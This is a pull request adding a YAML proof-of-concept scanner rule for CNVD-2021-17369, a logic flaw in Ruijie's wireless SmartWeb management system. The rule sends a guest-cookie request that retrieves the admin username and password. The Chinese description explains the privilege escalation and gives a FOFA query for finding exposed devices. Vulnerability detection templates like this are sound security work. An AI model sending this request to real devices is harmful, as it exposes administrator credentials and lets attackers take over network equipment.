### PR TITLE
ruijie-smartweb-cnvd-2021-17369

### DIFF
--- a/pocs/ruijie-smartweb-cnvd-2021-17369.yml
+++ b/pocs/ruijie-smartweb-cnvd-2021-17369.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-ruijie-smartweb-cnvd-2021-17369
+rules:
+  - method: GET
+    path: /web/xml/webuser-auth.xml
+    headers:
+      Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
+    expression: |
+      response.status == 200 && response.body.bcontains(b"admin") && response.body.bcontains(b"<userauth>") && response.body.bcontains(b"<password>")
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
 锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞，攻击者可从低权限用户获取到管理员账号密码，从而从低权限提升到管理员权限。
## 测试环境
FOFA：title="无线smartWeb--登录页面"
## 备注
![image](https://user-images.githubusercontent.com/74232513/114533698-c16fab00-9c80-11eb-9cf6-8933f401574f.png)
